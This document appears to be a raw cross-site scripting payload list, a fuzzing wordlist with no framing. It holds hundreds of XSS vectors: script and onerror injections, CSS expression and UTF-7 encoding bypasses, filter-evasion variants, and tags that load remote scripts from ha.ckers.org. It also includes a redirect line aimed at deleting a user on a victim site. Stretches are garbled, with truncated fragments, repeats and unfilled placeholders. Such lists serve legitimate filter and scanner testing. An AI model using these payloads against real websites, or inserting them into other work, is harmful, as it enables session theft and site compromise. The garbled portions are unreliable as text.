javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'"><\x3Cscript>javascript:alert(1)</script>
'"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1) '"`>
--> -->
-->
-->
-->
`"'>
DEF
'"><\x3Cscript>javascript:alert(1)</script>
'"><\x00script>javascript:alert(1)
"'><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'><\x00img src=xxx:x onerror=javascript:alert(1)>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1); ABC
"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x0Conerror=javascript:alert(1)>"'>"'><img src=xxx:x \x27onerror=javascript:alert(1)>"'>'><script>\x3Bjavascript:alert(1)</script>
"'>
"'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"'>
"'><script>\xE2\x80\x84javascript:alert(1)</script>
"'>
"'><script>\x09javascript:alert(1)</script>
"'>
"'><script>\xE2\x80\x85javascript:alert(1)</script>
"'>
"'><script>\x00javascript:alert(1)</script>
"'>
"'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"'>
"'><script>\x0Cjavascript:alert(1)</script>
"'>
"'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"'>
"'><script>\x0Ajavascript:alert(1)</script>
"'>
"'><script>\x7Ejavascript:alert(1)</script>
"'>
"'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"'>
"'><script>\xC2\x85javascript:alert(1)</script>
"'>
"'><script>\xE2\x80\x83javascript:alert(1)</script>
"'>
"'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"'>
"'><script>\x21javascript:alert(1)</script>
"'>
"'><script>\xE2\x80\x86javascript:alert(1)</script>
"'>
"'><script>\x0Bjavascript:alert(1)</script>
"'>
"`'>
"/>javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
"'><img src=xxx:x onerror\x0B=javascript:alert(1)>"'>
"'><img src=xxx:x onerror\x0C=javascript:alert(1)>"'>
"'><img src=xxx:x onerror\x20=javascript:alert(1)>"'>
`"'>
alert(1)0
'>"> <! foo="[[[Inception]]"> <% foo>
@import "data:,%7bx:expression(javascript:alert(1))%7D"; XXXXXX X
XXX
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
¼script¾javascript:alert(1)¼/script¾ X 1 1
1 XXX
<
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
- XSS
www.
<?import namespace="xss" implementation="%(htc)s">XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X&&javascript:alert(1)&&;&&<&&/script&&>
<?xml version="1.0"?>javascript:alert(1);
<![CDATA[
]]
">">'> '';!--"=&{()}
">
perl -e 'print "
";' > out
SCRIPT/SRC="http://ha.ckers.org/xss.js" <
- XSS
exp/<A STYLE='no\xss:noxss("//");xss:ex/XSS///*/pression(alert("XSS"))'>
¼script¾alert(¢XSS¢)¼/script¾
www.<? echo('alert("XSS")'); ?>
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
PT SRC="ha.ckers.org/xss.js">
x
CLICKME
Click Me ‘; alert(1); ‘)alert(1);//
x ">‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>
”>
< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) foo
ipt>alert(1)ipt>
<IMG SRC=”javascript:alert(‘XSS’)”
PT SRC="ha.ckers.org/xss.js"> < ">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search
hellox worldss
lol
...LOL LOLLOL <SCRIPT>alert(/XSS/.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"ha.ckers.org/xss.css\"> <STYLE>@import'ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz-binding:url(\"ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC=\"mocha:[code]\"> <IMG SRC=\"livescript:[code]\"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert('XSS')\"> <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"width: expression(alert('XSS'));\"> <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <IMG STYLE=\"xss:expr/XSS/ession(alert('XSS'))\"> <XSS STYLE=\"xss:expression(alert('XSS'))\"> exp/<A STYLE='no\xss:noxss(\"//\"); xss:ex/XSS////pression(alert(\"XSS\"))'> <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF=\"javascript:alert('XSS');//\"> <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"ha.ckers.org/scriptlet.html\"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC=\"ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED> <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED> a=\"get\"; b=\"URL(\"\"; c=\"javascript:\"; d=\"alert('XSS');\")\"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML> <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> <XML SRC=\"xsstest.xml\" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"> </BODY></HTML> <SCRIPT SRC=\"ha.ckers.org/xss.jpg\"></SCRIPT> <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=ha.ckers.org/xss.js></SCRIPT>'\"--> <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> <IMG SRC=\"thesiteyouareon.com/somecommand.php?somevar..\"> Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=\">\" SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT =\">\" SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">\" '' SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT \"a='>'\" SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=
>SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">'>\" SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <A HREF=\"http://66.102.7.147/\">XSS</A> <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> <A HREF=\"http://1113982867/\">XSS</A> <A HREF=\"0x42.0x0000066.0x7.0x93\">XSS</A> <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> <A HREF=\"google.com\">XSS</A> <A HREF=\"//google\">XSS</A> <A HREF=\"ha.ckers.org@google\">XSS</A> <A HREF=\"google:ha.ckers.org\">XSS</A> <A HREF=\"google.com\">XSS</A> <A HREF=\"google.com.\">XSS</A> <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A> <A HREF=\"gohttp://www.google.com/ogle.com\">XSS</A> < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C <iframe src=ha.ckers.org/scriptlet.html> <IMG SRC=\"javascript:alert('XSS')\" <SCRIPT SRC=ha.ckers.org/.js> <SCRIPT SRC=ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\"XSS\");//<</SCRIPT> <SCRIPT/SRC=\"ha.ckers.org/xss.js\"></SCRIPT> <BODY onload!#$%&()~+-_.,:;?@[/|\]^=alert(\"XSS\")> <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <IMG SRC=\" javascript:alert('XSS');\"> perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out <IMG SRC=\"jav
ascript:alert('XSS');\"> <IMG SRC=\"jav
ascript:alert('XSS');\"> <IMG SRC=\"jav	ascript:alert('XSS');\"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> <IMG SRC=javascript:alert(\"RSnake says, 'XSS'\")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=\"javascript:alert('XSS');\"> <SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT> '';!--\"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()}">
SCRIPT/SRC="http://ha.ckers.org/xss.js" <
\";alert('XSS');// ¼script¾alert(¢XSS¢)¼/script¾
exp/<A STYLE='no\xss:noxss("//");xss:ex/XSS///*/pression(alert("XSS"))'>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">
PT SRC="ha.ckers.org/xss.js">
TESTHTML5FORMACTION crosssitespt<img src=x onerror=alert(123)//">
<? foo=">"> <! foo=">"> </ foo=">">
;1
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “> “>< foo
ipt>alert(document.cookie)ipt> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’;
">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
">
<IMG SRC=javascript:a&
#0000108ert('XSS')>
SCRIPT/SRC="http://ha.ckers.org/xss.js" <
- XSS
exp/<A STYLE='no\xss:noxss("//"); xss:ex/XSS///*/pression(alert("XSS"))'>
¼script¾alert(¢XSS¢)¼/script¾
www.<? echo('alert("XSS")'); ?>
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
PT SRC="ha.ckers.org/xss.js">
XSS 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)//
#">
element[attribute='
[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29;
alert;pg("XSS")
ipt>alert(1)ipt>ipt>alert(1)ipt>
iPt>alert(1)IPt> test %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
">
">123
">123
">
123
">123 ">123
Hover the cursor to the LEFT of this Message
&ParamHeight=250">
">123
">123
<iframe src=xss.rocks/scriptlet.html <
x
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1); '
"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)\x3Cscript>javascript:alert(1) '"`>
-->
--> --> --> --> `"'>
DEF
'
"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1) "'><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'><\x00img src=xxx:x onerror=javascript:alert(1)>javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1); ABC
DEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>"'>"'><img src=xxx:x \x0Conerror=javascript:alert(1)>"'>"'><img src=xxx:x \x27onerror=javascript:alert(1)>"'>"
'><script>\x3Bjavascript:alert(1)</script> "'> "'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "'> "'><script>\xE2\x80\x84javascript:alert(1)</script> "'> "'><script>\x09javascript:alert(1)</script> "'> "'><script>\xE2\x80\x85javascript:alert(1)</script> "'> "'><script>\x00javascript:alert(1)</script> "'> "'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "'> "'><script>\x0Cjavascript:alert(1)</script> "'> "'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "'> "'><script>\x0Ajavascript:alert(1)</script> "'> "'><script>\x7Ejavascript:alert(1)</script> "'> "'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "'> "'><script>\xC2\x85javascript:alert(1)</script> "'> "'><script>\xE2\x80\x83javascript:alert(1)</script> "'> "'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "'> "'><script>\x21javascript:alert(1)</script> "'> "'><script>\xE2\x80\x86javascript:alert(1)</script> "'> "'><script>\x0Bjavascript:alert(1)</script> "'> "`'> "/>"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1) ">
"'><img src=xxx:x onerror\x0B=javascript:alert(1)>"'>"'><img src=xxx:x onerror\x0C=javascript:alert(1)>"'>"'><img src=xxx:x onerror\x20=javascript:alert(1)>"'>`"'>
alert(1)0
'>"> <! foo="[[[Inception]]"> <% foo>
<img src onerror /" '"= alt=javascript:alert(1)//">
@import "data:,%7bx:expression(javascript:alert(1))%7D"; XXXXXX X
XXXXXX <// style=x:expression\28javascript:alert(1)\29>XXXXXXXXXX
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
¼script¾javascript:alert(1)¼/script¾ X 1 1
1 XXX
x<
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
- XSS
<?import namespace="xss" implementation="%(htc)s">XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X&&javascript:alert(1)&&;&&<&&/script&&>
<?xml version="1.0"?>javascript:alert(1);
<
<? echo('alert(\"XSS\")'); ?>">
<body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></>
window.alert("Bonjour !");onload=alert('XSS')> "> '">>
XSS
<?=''?>
" onfocus=alert(document.domain) "> <"
- XSS
perl -e 'print \"alert(\"XSS\")\";' > out
perl -e 'print \"
alert(1)
"> [color=red width=expression(alert(123))][color]Execute(MsgBox(chr(88)&chr(83)&chr(83)))< ">
'"> '"> '""> <<<
(123)
'> '>"> }
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='>
"+src="yoursite.com/xss.js?69,69">
<body background=javascript:'">> ">/XaDoS/> ">/KinG-InFeT.NeT> src="site.com/XSS.js"> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" />
XSS by xss
">>XSS by xss
'">>XSS by xss
<img """>XSS by xss
XSS by xss
">">>XSS by xss
XSS by xss
'><img src="" alt=\' simpatie.ro/index.php?page=friends&memb.. javapgno=2 ??XSS?? simpatie.ro/index.php?page=top_movies&c.. p=2 ??XSS?? '); alert('xss'); var x=' \'); alert(\'xss\');var x=\' //-->
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="thesiteyouareon.com/somecommand.php?somevar.."> Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser exp/<XSS STYLE='no\xss:noxss("//"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/XSS/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="ha.ckers.org/xss.css"> <STYLE>@import'ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <XML SRC="ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(ha.ckers.org/xss.htc);"> <SCRIPT SRC="ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert("RSnake says, 'XSS'")> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <IMG SRC=javascript:alert('XSS')> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()~+-_.,:;?@[/|]^=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=>` SRC="ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="0x42.0x0000066.0x7.0x93">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6	6.000146.0x7.147">XSS</A> <A HREF="google.com">XSS</A> <A HREF="//google">XSS</A> <A HREF="ha.ckers.org@google">XSS</A> <A HREF="google:ha.ckers.org">XSS</A> <A HREF="google.com">XSS</A> <A HREF="google.com.">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="gohttp://www.google.com/ogle.com">XSS</A><
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
\";document.vulnerable=true;;//
- XSS
1script3document.vulnerable=true;1/script3
exp/<A STYLE='no\xss:noxss("//");xss:ex/XSS///*/pression(document.vulnerable=true)'>
<![
]]
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"> <? echo('document.vulnerable=true'); ?>
+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
& &{document.vulnerable=true;};
< <![
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script><?import namespace="xss" implementation="securitycompass.com/xss.htc">XSS
